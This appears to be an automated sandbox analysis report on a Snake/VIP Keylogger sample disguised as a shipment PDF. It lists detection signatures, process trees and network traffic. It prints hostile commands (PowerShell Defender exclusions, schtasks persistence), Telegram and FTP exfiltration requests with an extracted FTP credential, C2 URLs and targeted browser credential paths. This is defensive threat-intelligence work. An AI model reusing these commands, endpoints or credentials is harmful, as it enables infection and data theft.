Windows Analysis Report
Shipment 990847575203.pdf.exe

Overview

General Information

Sample name:Shipment 990847575203.pdf.exe
Analysis ID:1575105
MD5:8626a0c350243b5390abf5dee2a40641
SHA1:8337486fbbece35e03456500b23c5044466419c7
SHA256:d16a272916c70064157e0cef6770ff47ed874369e4db36ae0a569dd85357efca
Tags:exe, user-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Shipment 990847575203.pdf.exe (PID: 5192 cmdline: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe" MD5: 8626A0C350243B5390ABF5DEE2A40641)
    • powershell.exe (PID: 2656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7384 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7252 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • FZcXKpA.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\FZcXKpA.exe MD5: 8626A0C350243B5390ABF5DEE2A40641)
    • schtasks.exe (PID: 7644 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}
Source, Rule, Description, Author, Strings
Source: 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Author: Joe Security
Source: 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Author: Joe Security
Source: 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Author: Joe Security
Source: 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Author: Joe Security
Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source, Rule, Description, Author, Strings
Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Author: Joe Security
Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Author: unknown
  • 0x2c1df:$a1: get_encryptedPassword
  • 0x2c4fc:$a2: get_encryptedUsername
  • 0x2bfef:$a3: get_timePasswordChanged
  • 0x2c0f8:$a4: get_passwordField
  • 0x2c1f5:$a5: set_encryptedPassword
  • 0x2d8ce:$a7: get_logins
  • 0x2d831:$a10: KeyLoggerEventArgs
  • 0x2d496:$a11: KeyLoggerEventArgsEventHandler
Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.unpack, Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Author: Florian Roth
  • 0x39fe6:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x39689:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x398e6:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3a2c5:$a5: \Kometa\User Data\Default\Login Data

                  System Summary

                  Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, NewProcessName: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 5192, ProcessName: Shipment 990847575203.pdf.exe
                  Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 2656, ProcessName: powershell.exe
                  Source: Network Connection, Author: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49719
                  Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\FZcXKpA.exe, ParentImage: C:\Users\user\AppData\Roaming\FZcXKpA.exe, ParentProcessId: 7360, ParentProcessName: FZcXKpA.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp", ProcessId: 7644, ProcessName: schtasks.exe
                  Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", ProcessId: 5692, ProcessName: schtasks.exe
                  Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ProcessId: 2656, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe", ParentImage: C:\Users\user\Desktop\Shipment 990847575203.pdf.exe, ParentProcessId: 5192, ParentProcessName: Shipment 990847575203.pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp", ProcessId: 5692, ProcessName: schtasks.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-14T13:49:42.279808+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49722 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:49:45.721882+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49726 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:49:48.779919+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:49:53.407497+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49736 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:49:54.941404+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49739 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:49:56.684295+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49742 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:49:59.996584+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49747 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:50:10.797902+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49754 | 172.67.177.134 | 443 | TCP
                  2024-12-14T13:50:30.404732+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49767 | 172.67.177.134 | 443 | TCP

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-12-14T13:49:38.000947+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49719 | 158.101.44.242 | 80 | TCP
                  2024-12-14T13:49:40.659005+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49719 | 158.101.44.242 | 80 | TCP
                  2024-12-14T13:49:44.110337+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49724 | 193.122.6.168 | 80 | TCP
                  2024-12-14T13:49:49.672852+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49731 | 193.122.6.168 | 80 | TCP
                  2024-12-14T13:49:51.782215+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49731 | 193.122.6.168 | 80 | TCP
                  2024-12-14T13:49:55.032239+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49740 | 193.122.6.168 | 80 | TCP

                  AV Detection

                  Source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "anonymous_log@kashmirestore.com", "Password": "c%P+6,(]YFvP", "FTP Server": "ftp://kashmirestore.com/", "Version": "4.4"}
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe, ReversingLabs: Detection: 65%
                  Source: Shipment 990847575203.pdf.exe, ReversingLabs: Detection: 65%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\FZcXKpA.exe, Joe Sandbox ML: detected
                  Source: Shipment 990847575203.pdf.exe, Joe Sandbox ML: detected

                  Location Tracking

                  Source: unknown, DNS query: name: reallyfreegeoip.org
                  Source: Shipment 990847575203.pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown, HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49720 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49734 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49755 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49768 version: TLS 1.2
                  Source: Shipment 990847575203.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  Source: unknown, DNS query: name: api.telegram.org
                  Source: Yara match, File source: 0.2.Shipment 990847575203.pdf.exe.430d590.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0.2.Shipment 990847575203.pdf.exe.42c9970.0.raw.unpack, type: UNPACKEDPE
                  Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1, Host: reallyfreegeoip.org, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1, Host: reallyfreegeoip.org
                  Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1, Host: api.telegram.org, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1, Host: api.telegram.org, Connection: Keep-Alive
                  Source: Joe Sandbox View, IP Address: 149.154.167.220
                  Source: Joe Sandbox View, IP Address: 193.122.6.168
                  Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown, DNS query: name: checkip.dyndns.org
                  Source: unknown, DNS query: name: reallyfreegeoip.org
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49719 -> 158.101.44.242:80
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49731 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49740 -> 193.122.6.168:80
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49726 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49739 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49722 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49730 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49767 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49754 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49742 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49747 -> 172.67.177.134:443
                  Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49736 -> 172.67.177.134:443
                  Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;), Host: checkip.dyndns.org, Connection: Keep-Alive
                  Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;), Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknown; HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49720 version: TLS 1.0
                  Source: unknown; HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49734 version: TLS 1.0
                  Source: unknown; TCP traffic detected without corresponding DNS query: 20.190.181.4
                  Source: unknown; TCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknown; TCP traffic detected without corresponding DNS query: 20.198.119.84
                  Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                  Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
                  Source: global traffic; HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic; HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                  Source: global traffic; DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic; DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic; DNS traffic detected: DNS query: kashmirestore.com
                  Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 14 Dec 2024 12:50:12 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 14 Dec 2024 12:50:32 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/q
                  Source: MSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://go.microso
                  Source: MSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://go.microsoHX
